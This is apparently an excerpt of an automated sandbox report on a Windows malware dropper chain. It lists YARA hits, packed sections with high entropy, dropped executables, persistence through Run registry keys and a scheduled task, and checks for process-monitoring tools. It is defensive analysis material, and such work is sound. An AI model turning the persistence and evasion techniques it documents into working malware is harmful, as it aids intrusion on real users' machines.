Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FieldCalculator.cs	.Net Code: CalculateInterruptibleCalculator System.AppDomain.Load(byte[])
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 7.2.SxQyhJr.exe.6240000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2452245090.0000000006240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SxQyhJr.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 2720, type: MEMORYSTR

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: SxQyhJr[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x16d4cc
Source: random[1].exe.6.dr	Static PE information: real checksum: 0x1c9b3a should be: 0x1c9ff1
Source: SxQyhJr.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x16d4cc
Source: random[1].exe2.6.dr	Static PE information: real checksum: 0x2a3ab9 should be: 0x2a70e2
Source: 98a7b9f337.exe.6.dr	Static PE information: real checksum: 0x44720a should be: 0x446939
Source: a6f0d09f38.exe.6.dr	Static PE information: real checksum: 0x1c9b3a should be: 0x1c9ff1
Source: file.exe	Static PE information: real checksum: 0x1d9764 should be: 0x1e1ec7
Source: b5da647ae3.exe.6.dr	Static PE information: real checksum: 0x1ce583 should be: 0x1c9bf3
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x1d9764 should be: 0x1e1ec7
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x1ce583 should be: 0x1c9bf3
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x44720a should be: 0x446939
Source: 8b82d73f70.exe.6.dr	Static PE information: real checksum: 0x2a3ab9 should be: 0x2a70e2

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: egarwnqv
Source: file.exe	Static PE information: section name: kktuolht
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: egarwnqv
Source: skotes.exe.0.dr	Static PE information: section name: kktuolht
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: jyijtabb
Source: random[2].exe.6.dr	Static PE information: section name: ckbvpooz
Source: random[2].exe.6.dr	Static PE information: section name: .taggant
Source: 98a7b9f337.exe.6.dr	Static PE information: section name:
Source: 98a7b9f337.exe.6.dr	Static PE information: section name: .idata
Source: 98a7b9f337.exe.6.dr	Static PE information: section name:
Source: 98a7b9f337.exe.6.dr	Static PE information: section name: jyijtabb
Source: 98a7b9f337.exe.6.dr	Static PE information: section name: ckbvpooz
Source: 98a7b9f337.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: bioduybg
Source: random[1].exe.6.dr	Static PE information: section name: eaqvzvci
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: a6f0d09f38.exe.6.dr	Static PE information: section name:
Source: a6f0d09f38.exe.6.dr	Static PE information: section name: .idata
Source: a6f0d09f38.exe.6.dr	Static PE information: section name:
Source: a6f0d09f38.exe.6.dr	Static PE information: section name: bioduybg
Source: a6f0d09f38.exe.6.dr	Static PE information: section name: eaqvzvci
Source: a6f0d09f38.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: sqwnkuay
Source: random[1].exe0.6.dr	Static PE information: section name: dlrscmkp
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: b5da647ae3.exe.6.dr	Static PE information: section name:
Source: b5da647ae3.exe.6.dr	Static PE information: section name: .idata
Source: b5da647ae3.exe.6.dr	Static PE information: section name:
Source: b5da647ae3.exe.6.dr	Static PE information: section name: sqwnkuay
Source: b5da647ae3.exe.6.dr	Static PE information: section name: dlrscmkp
Source: b5da647ae3.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: .idata
Source: random[1].exe2.6.dr	Static PE information: section name: xbmfzvhb
Source: random[1].exe2.6.dr	Static PE information: section name: ztggrlpz
Source: random[1].exe2.6.dr	Static PE information: section name: .taggant
Source: 8b82d73f70.exe.6.dr	Static PE information: section name:
Source: 8b82d73f70.exe.6.dr	Static PE information: section name: .idata
Source: 8b82d73f70.exe.6.dr	Static PE information: section name: xbmfzvhb
Source: 8b82d73f70.exe.6.dr	Static PE information: section name: ztggrlpz
Source: 8b82d73f70.exe.6.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_050F03E2 push cs; ret	0_2_050F03F3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_006FD91C push ecx; ret	6_2_006FD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00989680 push ebp; mov dword ptr [esp], 757EDB71h	6_2_009896AF
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00989680 push edi; mov dword ptr [esp], 57E939DFh	6_2_00989703
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00989680 push eax; mov dword ptr [esp], esi	6_2_0098973C
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00989680 push ecx; mov dword ptr [esp], edi	6_2_00989783
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_0158E988 push esp; retf	7_2_0158E9A6
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_0158EE80 pushfd ; retf	7_2_0158EE81
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061E8658 push 00000037h; ret	7_2_061E865F
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061E9E48 push es; iretd	7_2_061E9E58
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061E7E94 push FFFFFF90h; retf	7_2_061E7E9D
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061E7F7C push E803FE7Bh; ret	7_2_061E7F81
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061E93C4 push es; ret	7_2_061E93C8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061F9CE9 push es; ret	7_2_061F9CEC
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061FB560 push es; retf	7_2_061FB57C
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06539F26 push es; iretd	7_2_06539F28
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06534C66 push es; retf	7_2_06534CA0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_065310FC push eax; retf	7_2_06531103
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06534CA1 push es; retf	7_2_06534CA4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_065365EA push es; retf	7_2_06536650
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_066364FA push ebx; iretd	7_2_0663650A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063DE886 push edi; mov dword ptr [esp], 2ED07954h	13_2_063DE820
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063DE886 push edi; mov dword ptr [esp], eax	13_2_063DEE07
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063DE886 push edx; mov dword ptr [esp], ebx	13_2_063DEE13
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063DE886 push eax; mov dword ptr [esp], 7B0CE75Ah	13_2_063DF2C5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063DE886 push ecx; mov dword ptr [esp], esi	13_2_063DF407
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E1639 push eax; mov dword ptr [esp], 3EF51D66h	13_2_063E232F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E0E2C push 1C38B7BDh; mov dword ptr [esp], esi	13_2_063E0E3A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E0E2C push eax; mov dword ptr [esp], 3D4032C1h	13_2_063E0E3E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E0E2C push ecx; mov dword ptr [esp], 4E53CE1Bh	13_2_063E21B0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E460F push 038564DAh; mov dword ptr [esp], edx	13_2_063E4626

Source: file.exe	Static PE information: section name: entropy: 7.980771158039659
Source: file.exe	Static PE information: section name: egarwnqv entropy: 7.954289252151083
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.980771158039659
Source: skotes.exe.0.dr	Static PE information: section name: egarwnqv entropy: 7.954289252151083
Source: random[2].exe.6.dr	Static PE information: section name: jyijtabb entropy: 7.954103030134678
Source: SxQyhJr[1].exe.6.dr	Static PE information: section name: .text entropy: 7.945671182559719
Source: 98a7b9f337.exe.6.dr	Static PE information: section name: jyijtabb entropy: 7.954103030134678
Source: SxQyhJr.exe.6.dr	Static PE information: section name: .text entropy: 7.945671182559719
Source: random[1].exe.6.dr	Static PE information: section name: entropy: 7.969899728729919
Source: random[1].exe.6.dr	Static PE information: section name: bioduybg entropy: 7.952935716114438
Source: a6f0d09f38.exe.6.dr	Static PE information: section name: entropy: 7.969899728729919
Source: a6f0d09f38.exe.6.dr	Static PE information: section name: bioduybg entropy: 7.952935716114438
Source: random[1].exe0.6.dr	Static PE information: section name: sqwnkuay entropy: 7.954864550900061
Source: b5da647ae3.exe.6.dr	Static PE information: section name: sqwnkuay entropy: 7.954864550900061
Source: random[1].exe2.6.dr	Static PE information: section name: entropy: 7.764448278674302
Source: 8b82d73f70.exe.6.dr	Static PE information: section name: entropy: 7.764448278674302

Source: 7.2.SxQyhJr.exe.5a60000.2.raw.unpack, asXkdacxwMNyu0Oyerq.cs

High entropy of concatenated method names: 'NTwZu9ZRgC', 'icGyu4GKsds5wJKvHYY', 'cTCRSxGtnAXV86jeErZ', 'I6XQDo3yO8mwH4krEjW', 'uhBHhL3AmI1h0DwFiAR'

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8b82d73f70.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a6f0d09f38.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b5da647ae3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6e1fbaaba5.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a6f0d09f38.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a6f0d09f38.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b5da647ae3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b5da647ae3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6e1fbaaba5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6e1fbaaba5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8b82d73f70.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8b82d73f70.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
